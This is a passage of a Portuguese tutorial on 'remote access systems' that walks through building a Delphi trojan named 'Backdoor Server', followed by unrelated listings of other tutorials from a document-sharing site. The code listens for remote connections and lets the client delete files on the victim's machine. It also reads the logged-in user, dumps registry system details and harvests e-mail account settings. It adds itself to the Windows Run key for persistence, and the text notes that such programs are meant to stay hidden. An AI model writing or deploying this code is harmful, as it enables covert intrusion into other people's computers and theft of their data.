25 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 25 -p Exibe somente as conexões para um dos protocolos TCP, UDP e IP. -r Exibe o conteúdo da tabela de roteamento. intervalo Especifica o tempo em segundos de pausa para reexibir as informações selecionadas. Ctrl+C para interromper. Utilizaremos como cliente de nosso servidor o próprio programa Telnet do Windows. Vá em Iniciar->Executar e digite: telnet fig. 13 Executando telnet. O primeiro parâmetro que passamos ao telnet (o número ) é o IP do computador ao qual queremos nos conectar. Como o servidor está em nossa própria máquina, utilizamos o endereço que é conhecido como endereço de loopback (para testes locais). O segundo parâmetro é a porta de conexão que está aberta remotamente (no caso do nosso servidor ele abre a porta que já foi previamente configurada). Ao ser executado o telnet tentará se conectar à porta do computador e se a conexão for bem sucedida a tela do telnet ficará desta maneira: fig. 14 Telnet conectado ao servidor. Agora é só testar as funcionalidades do servidor!

26 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 26 Construindo o Servidor em Delphi Layout Particularmente prefiro Delphi para programação devido aos seus bons recursos em Orientação a Objeto. Abra a IDE do Delphi 5. Automaticamente já irá trazer um formulário padrão em tela para desenvolvimento. fig. 15 Formulário padrão do Delphi. Altera suas propriedades conforme segue: frmmain Name: frmmain; Caption: Backdoor Server; As propriedades Name e Caption tem as mesmas funcionalidades que em Visual Basic. Salve a unit como umain.pas através do menu File -> Save All ou através do botão Save All da TollBar. fig. 16 Botão Save All da Toolbar.

27 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 27 fig. 17 Salvando a unit umain.pas. Salve o projeto como TrojanServer.dpr fig. 18 Salvando o projeto TrojanServer.dpr. Adicione um componente TMemo ao formulário e altere suas propriedades conforme abaixo: minfo Align: alclient; Name: minfo; Lines: Apague seu conteúdo; A propriedade Align se refere ao alinhamento do componente no formulário e alclient significa que ele ficará expandido em toda a extensão do formulário. A propriedade Lines se refere ao conteúdo do TMemo.

28 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 28 Vá para a palheta Internet e adicione um componente TServerSocket. Este é o componente que faz o papel de servidor em nossa aplicação. Configure suas propriedades como a seguir: fig. 19 Adicionando TServerSocket ao projeto. Server Active: True; Name: Server; Port: 11111; A propriedade Active diz se o servidor está ativo ou não. Deixando esta propriedade como True, o servidor entrará em modo listening quando a aplicação entrar no ar. A propriedade Port se refere à qual porta o servidor ficará aguardando conexões. O formulário deverá se parecer com o mostrado abaixo: fig. 20 Tela do servidor em Delphi. Codificando o Servidor em Delphi Abra o código da unit umain e adicione a entrada Registry em uses como mostrado abaixo, para que possamos acessar o componente do Registry do Delphi. Diferentemente do Visual Basic, não temos que programar um módulo ou uma classe, pois o componente já está pronto, basta apenas utilizarmos seus métodos:

29 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 29 Uses uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, ScktComp, Registry; Adicione as seguintes declarações em Private Declarations conforme abaixo: Private Declarations private { Private declarations } scommand: String; function MSG(sMSG: String): String; function HELP: String; function BANNER: String; function DEL(sFile: String): String; function RegInfo: String; function GetMailInfo: String; function GetCurrentUserName: String; Agora adicionaremos os códigos das funções na unit após a linha {$R *.DFM} function TfrmMain.BANNER: String; function TfrmMain.BANNER: String; Result:= (' ' + #$D#$A + #$D#$A); Result:= Result + (' Delphi - BACKDOOR SERVER ' + #$D#$A); Result:= Result + (' Version Internet.Zero.Polar.Age ' + #$D#$A); Result:= Result + (' Developed by Guilherme Cestarolli Seleguim ' + #$D#$A); Result:= Result + (' Welcome Invasor! Type Help for the list of commands ' + #$D#$A); Result:= Result + (' ' + #$D#$A + #$D#$A); Result:= Result + ('BACKDOOR->'); Quando algum cliente se conectar ao nosso servidor este banner de apresentação será exibido. function TfrmMain.DEL(sFile: String): String; function TfrmMain.DEL(sFile: String): String; if DeleteFile(sFile) then Result:= 'The file ' + sfile + ' was deleted.' + #$D#$A else Result:= 'The file ' + sfile + ' could not be deleted.' + #$D#$A;

30 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 30 Result:= Result + 'BACKDOOR->'; Quando solicitada a deleção de um arquivo pelo cliente, o servidor irá utilizar esta função para faze-lo. Para apagar um arquivo utilizando o Delphi usamos a função DeleteFile (FileName). DeleteFile retorna True se conseguiu apagar o arquivo ou False caso contrário. function TfrmMain.GetCurrentUserName: String; function TfrmMain.GetCurrentUserName: String; const cnmaxusernamelen = 254; var susername: String; dwusernamelen: DWORD; dwusernamelen := cnmaxusernamelen - 1; SetLength(sUserName, cnmaxusernamelen); GetUserName(PChar(sUserName), dwusernamelen); SetLength(sUserName, dwusernamelen); Result:= susername + #$D#$A; Result:= Result + 'BACKDOOR->'; Quando solicitado o usuário corrente do Windows pelo cliente, o servidor irá utilizar esta função para faze-lo. function TfrmMain.GetMailInfo: String; function TfrmMain.GetMailInfo: String; var Reg: TRegistry; AccountStr: string; Reg:= TRegistry.Create; try Reg.RootKey := HKEY_CURRENT_USER; if Reg.OpenKey('Software\Microsoft\Internet Account Manager', False) then {} AccountStr := Reg.ReadString('Default Mail Account'); Reg.CloseKey; if (AccountStr <> '') then if Reg.OpenKey('Software\Microsoft\Internet Account Manager\Accounts\' + AccountStr, False) then {} Result:= 'Account Name: ' + Reg.ReadString('Account Name') + #$D#$A; Result:= Result + 'POP3 Server: ' + Reg.ReadString('POP3 Server') + #$D#$A; Result:= Result + 'POP3 User Name: ' + Reg.ReadString('POP3 User Name') + #$D#$A; Result:= Result + 'SMTP Server: ' + Reg.ReadString('SMTP Server') + #$D#$A; Result:= Result + 'SMTP Display Name: ' + Reg.ReadString('SMTP Display Name') + #$D#$A; Result:= Result + 'SMTP Address: ' + Reg.ReadString('SMTP Address') + #$D#$A;

31 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 31 Result:= Result + 'BACKDOOR->'; Reg.CloseKey; finally Reg.Free; Quando solicitadas informações de pelo cliente, o servidor irá utilizar esta função para faze-lo. function TfrmMain.HELP: String; function TfrmMain.HELP: String; Result:= 'Available commands for this version are listed below:' + #$D#$A; Result:= Result + 'HELP (Shows available commands)' + #$D#$A; Result:= Result + 'MSG (Sends message. Example: MSG Message)' + #$D#$A; Result:= Result + 'USER (Retrieve user current logged)' + #$D#$A; Result:= Result + 'DEL (Deletes a file. Example: DEL PathOfFile)' + #$D#$A; Result:= Result + 'REGINFO (Retrieve Registry Information)' + #$D#$A; Result:= Result + 'MAILINFO (Retrieve Mail Information)' + #$D#$A; Result:= Result + 'QUIT (Disconnects from the server)' + #$D#$A; Result:= Result + 'BACKDOOR->'; Quando solicitadas as funções que o servidor executa, o servidor irá utilizar esta função para faze-lo. function TfrmMain.MSG(sMSG: String): String; function TfrmMain.MSG(sMSG: String): String; Result:= 'The message was delivered' + #$D#$A; Result:= Result + ('BACKDOOR->'); MessageBox(Handle, Pchar(sMSG), 'You received a message!', MB_OK); Quando o cliente quiser enviar uma mensagem para o servidor, o servidor irá utilizar esta função para faze-lo. function TfrmMain.RegInfo: String; function TfrmMain.RegInfo: String; var Reg: TRegistry; Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; if Reg.OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion', False) = true then Result := 'Windows 9x' + #$D#$A; Result := Result + Reg.ReadString('ProductName') + #$D#$A; Result := Result + Reg.ReadString('VersionNumber') + #$D#$A;

32 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 32 if Reg.OpenKey('\SOFTWARE\Microsoft\Windows NT\CurrentVersion', False) = true then if Length(Result)>0 then Result := ''; Result:= 'Windows NT' + #$D#$A; Result:= Result + 'Platform ID: ' + Reg.ReadString('ProductName') + #$D#$A; Result:= Result + 'CSD Version: ' + Reg.ReadString('CSDVersion') + #$D#$A; Result:= Result + 'Current Version: ' + Reg.ReadString('CurrentVersion') + #$D#$A; Result:= Result + 'Current Build: ' + Reg.ReadString('CurrentBuild') + #$D#$A; Result:= Result + 'Current Build Number: ' + Reg.ReadString('CurrentBuildNumber') + #$D#$A; Result:= Result + 'Current Type: ' + Reg.ReadString('CurrentType') + #$D#$A; Result:= Result + 'Product ID: ' + Reg.ReadString('ProductId') + #$D#$A; Result:= Result + 'Registered Organization: ' + Reg.ReadString('RegisteredOrganization') + #$D#$A; Result:= Result + 'Registered Owner: ' + Reg.ReadString('RegisteredOwner') + #$D#$A; Result:= Result + 'Path Name: ' + Reg.ReadString('PathName') + #$D#$A; Result:= Result + 'Source Path: ' + Reg.ReadString('SourcePath') + #$D#$A; Result:= Result + 'System Root: ' + Reg.ReadString('SystemRoot') + #$D#$A; Result:= Result + 'BACKDOOR->'; Reg.Free; Agora que as funções estão codificadas vamos escrever as rotinas do componente TServerSocket. Para isso clique sobre o componente Server no formulário e pressione a tecla F11 para que a janela de propriedades e eventos seja mostrada. Dê duplo clique ao lado dos eventos OnClientConnect, OnClientDisconnect, OnClientError e OnClientRead para que o esqueleto dos procedimentos seja estruturado na unit do formulário. Entre com código em cada um deles conforme abaixo: fig. 21 Eventos de TServerSocket. procedure TfrmMain.ServerClientConnect procedure TfrmMain.ServerClientConnect(Sender: TObject; Socket: TCustomWinSocket); minfo.lines.add (Socket.RemoteHost + ' is connected');

33 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 33 Socket.SendText (BANNER); Toda vez que algum cliente se conectar em nosso servidor será invocado este procedimento que adicionará uma entrada em nosso memo de informações e enviará ao cliente o resultado de nossa função Banner( ) através do método SendText. procedure TfrmMain.ServerClientDisconnect procedure TfrmMain.ServerClientDisconnect(Sender: TObject; Socket: TCustomWinSocket); minfo.lines.add (Socket.RemoteHost + ' is disconnected'); Toda vez que um cliente se desconectar do servidor este procedimento será invocado e adicionará uma entrada no memo de informações. procedure TfrmMain.ServerClientRead procedure TfrmMain.ServerClientRead(Sender: TObject; Socket: TCustomWinSocket); var smsg, saction, sparameter: String; iposspace: Integer; smsg:= Socket.ReceiveText; //Typed Enter if smsg = #$D#$A then iposspace:= Pos(' ', scommand); //There is a parameter if iposspace > 0 then saction:= Copy(sCommand, 1, iposspace - 1); Delete(sCommand, 1, iposspace); sparameter:= scommand; end else saction:= scommand; //Typed MSG if UpperCase(sAction) = 'MSG' then scommand:= ''; Socket.SendText (MSG(sParameter)); end //Typed QUIT else if UpperCase(sAction) = 'QUIT' then Socket.SendText ('Connection terminated...'); Socket.Close; end

34 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 34 //Typed HELP else if UpperCase(sAction) = 'HELP' then scommand:= ''; Socket.SendText (HELP); end //Typed DEL else if UpperCase(sAction) = 'DEL' then scommand:= ''; Socket.SendText (DEL(sParameter)); end //Typed REGINFO else if UpperCase(sAction) = 'REGINFO' then scommand:= ''; Socket.SendText (RegInfo); end //Typed MAILINFO else if UpperCase(sAction) = 'MAILINFO' then scommand:= ''; Socket.SendText (GetMailInfo); end //Typed USER else if UpperCase(sAction) = 'USER' then scommand:= ''; Socket.SendText (GetCurrentUserName); end //Typed a non-existant command else Socket.SendText ('Command not recognized.' + #$D#$A); Socket.SendText ('BACKDOOR->'); scommand:= ''; end end //Typed a word different than BackSpace else if smsg <> #8 then scommand:= scommand + smsg //Typed BackSpace else if Length(sCommand) = 0 then Socket.SendText (#13 + 'BACKDOOR->') else scommand:= Copy(sCommand, 1, Length(sCommand) - 1); Este método é invocado quando algum cliente envia dados ao servidor. Guardamos a informação enviada na variável smsg através do método ReceiveText. Guardamos na variável

35 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 35 saction o comando enviado e se houver um parâmetro para este comando guardamos ele em sparameter. Verificamos o comando e se for válido executamos a função referenciada implementando assim um protocolo de comunicação. procedure TfrmMain.ServerClientError procedure TfrmMain.ServerClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); var msg: String; msg:= 'Ocorreu um erro ao '; case ErrorEvent of eegeneral: msg:= 'Falha geral de comunicação(erro desconhecido)'; eesend: msg:= msg + 'enviar dados'; eereceive: msg:= msg + 'receber dados'; eeconnect: msg:= msg + 'conectar'; eedisconnect: msg:= msg + 'desconectar'; eeaccept: msg:= msg + 'aceitar a conexão'; ShowMessage(msg); ErrorCode:= 0; {Evita a mensagem padrão} Caso ocorra algum erro entre a conexão, será verificado o tipo de erro para mostrar uma mensagem condizente. Agora que o servido está codificado é só testa-lo da mesma maneira que foi testado o servidor em Visual Basic Registrando o servidor para início automático Os Cavalos de Tróia em sua maioria se registram no Windows para que sejam iniciados toda vez que o Windows for ligado. A chave do Registro onde gravam suas entradas é a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\. A entrada é um Valor de Seqüência contendo o caminho para o servidor na máquina. Para acessar o Registro vá em Iniciar -> Executar -> regedit.

36 SISTEMAS DE ACESSO REMOTO REMOTE ACCESS SYSTEMS 36 fig. 22 REGEDIT Editor do Registro do Windows. Registrando o servidor em Delphi Para registrar nosso programa utilizando Delphi digite o código abaixo no evento FormCreate de nosso formulário frmmain: procedure TfrmMain.FormCreate(Sender: TObject); procedure TfrmMain.FormCreate(Sender: TObject); var Reg: TRegistry; Reg: TRegistry.Create; Reg.RootKey:= HKEY_LOCAL_MACHINE; Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',False); Reg.WriteString('MeuTrojanDelphi',Application.ExeName); Reg.CloseKey; Reg.Free; Registrando o servidor em Visual Basic Altere o código do evento Form_Load( ) conforme abaixo: Private Sub Form_Load() Private Sub Form_Load() SetKeyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", "MeuTrojanVB", App.Path & "\" & App.EXEName, REG_SZ Server.Listen End Sub E assim concluímos os dois modelos de Trojans. Vale lembrar que este tipo de aplicação visa ficar escondido e para isso nem seu formulário principal é mostrado quando iniciado e

SUMÁRIO 1. AULA 6 ENDEREÇAMENTO IP:... 2

SUMÁRIO 1. AULA 6 ENDEREÇAMENTO IP:... 2 SUMÁRIO 1. AULA 6 ENDEREÇAMENTO IP:... 2 1.1 Introdução... 2 1.2 Estrutura do IP... 3 1.3 Tipos de IP... 3 1.4 Classes de IP... 4 1.5 Máscara de Sub-Rede... 6 1.6 Atribuindo um IP ao computador... 7 2

Leia mais

RESTAURAÇÃO NO WINDOWS 8

RESTAURAÇÃO NO WINDOWS 8 RESTAURAÇÃO NO WINDOWS 8 Este documento se aplica aos computadores HP e Compaq com Windows 8, mas a lógica de funcionamento é a mesma para os demais computadores. Este documento explica como usar e solucionar

Leia mais

Curso de Informática Básica

Curso de Informática Básica Curso de Informática Básica O e-mail Primeiros Cliques 1 Curso de Informática Básica Índice Introdução...3 Receber, enviar e responder mensagens...3 Anexando arquivos...9 Cuidado com vírus...11 2 Outlook

Leia mais

Barra de ferramentas padrão. Barra de formatação. Barra de desenho Painel de Tarefas

Barra de ferramentas padrão. Barra de formatação. Barra de desenho Painel de Tarefas Microsoft Power Point 2003 No Microsoft PowerPoint 2003, você cria sua apresentação usando apenas um arquivo, ele contém tudo o que você precisa uma estrutura para sua apresentação, os slides, o material

Leia mais

Instalação: permite baixar o pacote de instalação do agente de coleta do sistema.

Instalação: permite baixar o pacote de instalação do agente de coleta do sistema. O que é o projeto O PROINFODATA - programa de coleta de dados do projeto ProInfo/MEC de inclusão digital nas escolas públicas brasileiras tem como objetivo acompanhar o estado de funcionamento dos laboratórios

Leia mais

Dicas para usar melhor o Word 2007

Dicas para usar melhor o Word 2007 Dicas para usar melhor o Word 2007 Quem está acostumado (ou não) a trabalhar com o Word, não costuma ter todo o tempo do mundo disponível para descobrir as funcionalidades de versões recentemente lançadas.

Leia mais

AMBIENTE. FORMULÁRIO: é a janela do aplicativo apresentada ao usuário. Considere o formulário como a sua prancheta de trabalho.

AMBIENTE. FORMULÁRIO: é a janela do aplicativo apresentada ao usuário. Considere o formulário como a sua prancheta de trabalho. DELPHI BÁSICO VANTAGENS Ambiente de desenvolvimento fácil de usar; 1. Grande Biblioteca de Componentes Visuais (VCL - Visual Component Library), que são botões, campos, gráficos, caixas de diálogo e acesso

Leia mais

Ao ligar o equipamento, você verá a mensagem abaixo, o objetivo dela é fazer a configuração mínima para LOGAR ao servidor da Internet.

Ao ligar o equipamento, você verá a mensagem abaixo, o objetivo dela é fazer a configuração mínima para LOGAR ao servidor da Internet. MANUAL DE OPERAÇÃO DO NET MACHINE VOCÊ NÃO NECESSITA MAIS DE UM COMPUTADOR PARA CONVERSAR COM ALGUÉM QUE ESTA NO MIRC NET MACHINE É UM PLACA ELETRÔNICA DE BAIXO CUSTO A PLACA TAMBEM PODE MANDAR E LER E-MAILS

Leia mais

Instalando software MÉDICO Online no servidor

Instalando software MÉDICO Online no servidor Instalando software MÉDICO Online no servidor A máquina denominada Servidora é a que armazenará o banco de dados do software (arquivo responsável pelas informações inseridas), compartilhando com as demais

Leia mais

Instalação e Configuração RPM Remote Print Manager para Windows 2000

Instalação e Configuração RPM Remote Print Manager para Windows 2000 Instalação e Configuração RPM Remote Print Manager para Windows 2000 Antes de iniciar a instalação do RPM Remote Print Manager parar Windows 2000, você necessita ter privilégios de "administrador" devido

Leia mais

GRUPO IV 2 o BIMESTRE PROVA A

GRUPO IV 2 o BIMESTRE PROVA A A GERAÇÃO DO CONHECIMENTO Transformando conhecimentos em valores www.geracaococ.com.br Unidade Portugal Série: 6 o ano (5 a série) Período: MANHÃ Data: 12/5/2010 PROVA GRUPO GRUPO IV 2 o BIMESTRE PROVA

Leia mais

COMPARTILHAMENTO DO DISCO E PERMISSÕES DE REDE PÚBLICAS E DE GRUPOS DE TRABALHO.

COMPARTILHAMENTO DO DISCO E PERMISSÕES DE REDE PÚBLICAS E DE GRUPOS DE TRABALHO. COMPARTILHAMENTO DO DISCO E PERMISSÕES DE REDE PÚBLICAS E DE GRUPOS DE TRABALHO. 1. Compartilhar a máquina servidor clicando com o botão direito do mouse em disco local e no menu de contexto não pção Propriedades.

Leia mais

Como instalar uma impressora?

Como instalar uma impressora? Como instalar uma impressora? Antes de utilizar uma impressora para imprimir seus documentos, arquivos, fotos, etc. é necessário instalá-la e configurá-la no computador. Na instalação o computador se prepara

Leia mais

RASTREIE SEU NOTEBOOK (FURTADO OU ROUBADO) INTERNET

RASTREIE SEU NOTEBOOK (FURTADO OU ROUBADO) INTERNET Veja nesse tutorial vamos aprender como instalar o aplicativo gratuito Prey e como realizar o rastreamento de seu computador (netbook, notebook, desktop). Prey é uma aplicativo que você instala em sua

Leia mais

Procedimentos para Configuração de Redirecionamento de Portas

Procedimentos para Configuração de Redirecionamento de Portas 1 Procedimentos para Configuração de Redirecionamento de Portas O DIR 635 tem duas opções para liberação de portas: Virtual server: A opção Virtual Server permite que você defina uma única porta pública

Leia mais

Operador de Computador. Informática Básica

Operador de Computador. Informática Básica Operador de Computador Informática Básica Instalação de Software e Periféricos Podemos ter diversos tipos de software que nos auxiliam no desenvolvimento das nossas tarefas diárias, seja ela em casa, no

Leia mais

Polycom RealPresence Content Sharing Suite Guia rápido do usuário

Polycom RealPresence Content Sharing Suite Guia rápido do usuário Polycom RealPresence Content Sharing Suite Guia rápido do usuário Versão 1.2 3725-69877-001 Rev.A Novembro de 2013 Neste guia, você aprenderá a compartilhar e visualizar conteúdos durante uma conferência

Leia mais

Configurando um Grupo Doméstico e Compartilhando arquivos no Windows 7

Configurando um Grupo Doméstico e Compartilhando arquivos no Windows 7 Configurando um Grupo Doméstico e Compartilhando arquivos no Windows 7 Para criar um grupo doméstico e compartilhar arquivos é necessário que tenhamos pelo menos dois computadores ligados entre si (em

Leia mais

CONFIGURAÇÃO MINIMA EXIGIDA:

CONFIGURAÇÃO MINIMA EXIGIDA: Este tutorial parte do princípio que seu usuário já possua conhecimentos básicos sobre hardware, sistema operacional Windows XP ou superior, firewall, protocolo de rede TCP/IP e instalação de software.

Leia mais

Manual de Instalação EDIÇÃO 1.0

Manual de Instalação EDIÇÃO 1.0 Editor Rápido ipldk Manual de Instalação EDIÇÃO 1.0 HISTÓRICO DE REVISÃO Edição Data Descrição das Alterações Versão S/W Versão MPB Edição 1 Out/2006 Lançamento Inicial C.7Aa ~ C.7Aa - i - Conteúdo 1.

Leia mais

Manual Operacional SIGA

Manual Operacional SIGA SMS - ATTI Julho -2012 Conteúdo Sumário... 2... 3 Consultar Registros... 4 Realizar Atendimento... 9 Adicionar Procedimento... 11 Não Atendimento... 15 Novo Atendimento... 16 Relatórios Dados Estatísticos...

Leia mais

Celebre este natal e ano novo junto aos seus amigos e familiares distantes.

Celebre este natal e ano novo junto aos seus amigos e familiares distantes. Celebre este natal e ano novo junto aos seus amigos e familiares distantes. Receba fotos e mensagens deles na TV de sua casa em tempo real e sem custo, não se preocupe mais com a distância! A festa será

Leia mais

INDICE 1. INTRODUÇÃO... 3 2. CONFIGURAÇÃO MÍNIMA... 4 3. INSTALAÇÃO... 4 4. INTERLIGAÇÃO DO SISTEMA... 5 5. ALGUNS RECURSOS... 6 6. SERVIDOR BAM...

INDICE 1. INTRODUÇÃO... 3 2. CONFIGURAÇÃO MÍNIMA... 4 3. INSTALAÇÃO... 4 4. INTERLIGAÇÃO DO SISTEMA... 5 5. ALGUNS RECURSOS... 6 6. SERVIDOR BAM... 1 de 30 INDICE 1. INTRODUÇÃO... 3 2. CONFIGURAÇÃO MÍNIMA... 4 3. INSTALAÇÃO... 4 3.1. ONDE SE DEVE INSTALAR O SERVIDOR BAM?... 4 3.2. ONDE SE DEVE INSTALAR O PROGRAMADOR REMOTO BAM?... 4 3.3. COMO FAZER

Leia mais

Na Figura a seguir apresento um exemplo de uma "mini-tabela" de roteamento:

Na Figura a seguir apresento um exemplo de uma mini-tabela de roteamento: Tutorial de TCP/IP - Parte 6 - Tabelas de Roteamento Por Júlio Cesar Fabris Battisti Introdução Esta é a sexta parte do Tutorial de TCP/IP. Na Parte 1 tratei dos aspectos básicos do protocolo TCP/IP. Na

Leia mais

END OF FILE: Tutorial Chat Em Delphi

END OF FILE: Tutorial Chat Em Delphi END OF FILE: Tutorial Chat Em Delphi fórum: http://offile.umforum.net site: http://fts315.xp3.biz autor: kõdo no kami (www.facebook.com/hacker.fts315) - skype: hackefts315 greetz: mmxm, sir.rafiki, suspeit0@virtual,

Leia mais

Passo 1: Abra seu navegador e digite http://www.no-ip.com. Passo 2: Na tela que surgir, clique em Get Started.

Passo 1: Abra seu navegador e digite http://www.no-ip.com. Passo 2: Na tela que surgir, clique em Get Started. 1 - Como obter seu DNS Dinâmico no No-IP O No-IP, é um sistema de DNS (Domain Name Server), que converte o seu endereço IP em um nome. O que o No-IP faz, é converter o nome do tipo minhacameraip.no-ip.org

Leia mais

ALTERNATIVA PARA CONEXÃO VIA INTERNET DE IP MASCARADO A IP REAL

ALTERNATIVA PARA CONEXÃO VIA INTERNET DE IP MASCARADO A IP REAL Documento: Tutorial Autor: Iuri Sonego Cardoso Data: 27/05/2005 E-mail: iuri@scripthome.cjb.net Home Page: http://www.scripthome.cjb.net ALTERNATIVA PARA CONEXÃO VIA INTERNET DE IP MASCARADO A IP REAL

Leia mais

Follow-Up Acompanhamento Eletrônico de Processos (versão 3.0) Manual do Sistema. 1. Como acessar o sistema Requisitos mínimos e compatibilidade

Follow-Up Acompanhamento Eletrônico de Processos (versão 3.0) Manual do Sistema. 1. Como acessar o sistema Requisitos mínimos e compatibilidade do Sistema Índice Página 1. Como acessar o sistema 1.1 Requisitos mínimos e compatibilidade 03 2. Como configurar o Sistema 2.1 Painel de Controle 2.2 Informando o nome da Comissária 2.3 Escolhendo a Cor

Leia mais

Capítulo 2. Laboratório 2.1. Introdução ao Packet Tracer, Roteadores, Switches e Inicialização

Capítulo 2. Laboratório 2.1. Introdução ao Packet Tracer, Roteadores, Switches e Inicialização Capítulo 2 Laboratório 2.1 Introdução ao Packet Tracer, Roteadores, Switches e Inicialização tel (41) 430457810 ou (41) 4063-7810 - info@dltec.com.br - www.dltec.com.br INDICE 1 Objetivo do Laboratório...

Leia mais

Manual B.P.S ATA 5xxx Índice

Manual B.P.S ATA 5xxx Índice Manual B.P.S ATA 5xxx Índice 1. Conectando o Adaptador para Telefone Analógico (ATA)...02 2. Configurações básicas...05 2.1 Configuração dos parâmetros de usuário e senha para acessos de banda larga do

Leia mais

FileZilla Server. O FileZilla Server é um ótimo servidor FTP, conta com diversas funções e fácil instalação e configuração.

FileZilla Server. O FileZilla Server é um ótimo servidor FTP, conta com diversas funções e fácil instalação e configuração. FileZilla Server Já apresentei um tutorial sobre o FileZilla, um cliente FTP com versões para vários sistemas operacionais, agora vou falar sobre o FileZilla Server, um programa que transforma seu computador

Leia mais

Conexão rápida entre dois computadores em uma plataforma Linux

Conexão rápida entre dois computadores em uma plataforma Linux Conexão rápida entre dois computadores em uma plataforma Linux Algumas vezes, novos usuários de Linux acabam achando difícil transferir aquivos entre duas máquinas Linux em rede (no meu caso via cabo).

Leia mais

Tutorial Ouvidoria. Acesso, Utilização, Visualização das Manifestações e Resposta ao Manifestante

Tutorial Ouvidoria. Acesso, Utilização, Visualização das Manifestações e Resposta ao Manifestante Tutorial Ouvidoria Acesso, Utilização, Visualização das Manifestações e Resposta ao Manifestante Como acessar a Ouvidoria? 1. Primeiramente acesse o site de sua instituição, como exemplo vamos utilizar

Leia mais

Acesso Remoto Placas de captura

Acesso Remoto Placas de captura Acesso Remoto Placas de captura 1 instalar o DVR Siga os passos de instalação informados na caixa do produto, após seu perfeito funcionamento vá para próximo passo. 2 Configurá-lo na rede Local O computador

Leia mais

Satélite. Manual de instalação e configuração. CENPECT Informática www.cenpect.com.br cenpect@cenpect.com.br

Satélite. Manual de instalação e configuração. CENPECT Informática www.cenpect.com.br cenpect@cenpect.com.br Satélite Manual de instalação e configuração CENPECT Informática www.cenpect.com.br cenpect@cenpect.com.br Índice Índice 1.Informações gerais 1.1.Sobre este manual 1.2.Visão geral do sistema 1.3.História

Leia mais

Resolvendo problemas de conexão de rede wireless no pregão 83/2008

Resolvendo problemas de conexão de rede wireless no pregão 83/2008 Resolvendo problemas de conexão de rede wireless no pregão 83/2008 Recentemente forma instalados em minha cidade novos laboratórios do pregão 83/2008 mas em nenhum deles os terminais acessavam a rede.

Leia mais

1- Requisitos mínimos. 2- Instalando o Acesso Full. 3- Iniciando o Acesso Full pela primeira vez

1- Requisitos mínimos. 2- Instalando o Acesso Full. 3- Iniciando o Acesso Full pela primeira vez Manual Conteúdo 1- Requisitos mínimos... 2 2- Instalando o Acesso Full... 2 3- Iniciando o Acesso Full pela primeira vez... 2 4- Conhecendo a barra de navegação padrão do Acesso Full... 3 5- Cadastrando

Leia mais

SISTEMAS OPERACIONAIS LIVRES. Professor Carlos Muniz

SISTEMAS OPERACIONAIS LIVRES. Professor Carlos Muniz SISTEMAS OPERACIONAIS LIVRES Agendar uma tarefa Você deve estar com logon de administrador para executar essas etapas. Se não tiver efetuado logon como administrador, você só poderá alterar as configurações

Leia mais

3. No painel da direita, dê um clique com o botão direito do mouse em qualquer espaço livre (área em branco).

3. No painel da direita, dê um clique com o botão direito do mouse em qualquer espaço livre (área em branco). Permissões de compartilhamento e NTFS - Parte 2 Criando e compartilhando uma pasta - Prática Autor: Júlio Battisti - Site: www.juliobattisti.com.br Neste tópico vamos criar e compartilhar uma pasta chamada

Leia mais

MANUAL DO ANIMAIL 1.0.0.1142 Terti Software

MANUAL DO ANIMAIL 1.0.0.1142 Terti Software O Animail é um software para criar campanhas de envio de email (email Marketing). Você pode criar diversas campanhas para públicos diferenciados. Tela Principal do sistema Para melhor apresentar o sistema,

Leia mais

Procedimentos para Reinstalação do Sisloc

Procedimentos para Reinstalação do Sisloc Procedimentos para Reinstalação do Sisloc Sumário: 1. Informações Gerais... 3 2. Criação de backups importantes... 3 3. Reinstalação do Sisloc... 4 Passo a passo... 4 4. Instalação da base de dados Sisloc...

Leia mais

Manual de Instalação e Configuração para Revendedores e Assinantes Virtual Server.

Manual de Instalação e Configuração para Revendedores e Assinantes Virtual Server. Manual de Instalação e Configuração para Revendedores e Assinantes Virtual Server. Parte I Cadastrando Sites no painel de controle Parte II Criando E-mail Parte III Configurando o Outlook do Cliente Última

Leia mais

Manual de Instalação e Configuração. Módulo Remote. (G2KA) para NFSE. v1.0

Manual de Instalação e Configuração. Módulo Remote. (G2KA) para NFSE. v1.0 Manual de Instalação e Configuração Módulo Remote (G2KA) para NFSE v1.0 Página 1 Sumário 1 Download e Instalação... 3 2 Configuração... 5 3 Inicialização Manual... 8 4 Inicialização via serviço do Windows...

Leia mais

GUIA MUDANÇA E FORMATAÇÃO DE SERVIDOR - MILLENNIUM

GUIA MUDANÇA E FORMATAÇÃO DE SERVIDOR - MILLENNIUM GUIA MUDANÇA E FORMATAÇÃO DE SERVIDOR - MILLENNIUM ÍNDICE ITEM Página 1. Objetivo... 3 2. Requisitos... 3 3. Diretório do Millennium... 3 4. Procedimento para Transferência de Servidor... 3 4.1 Compartilhamento

Leia mais

TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH!

TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH! UNIVERSIDADE DE SÃO PAULO (USP) ESCOLA DE ARTES, CIÊNCIAS E HUMANIDADES (EACH) TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH! Autoria e revisão por: PET Sistemas

Leia mais

Como instalar Windows XP

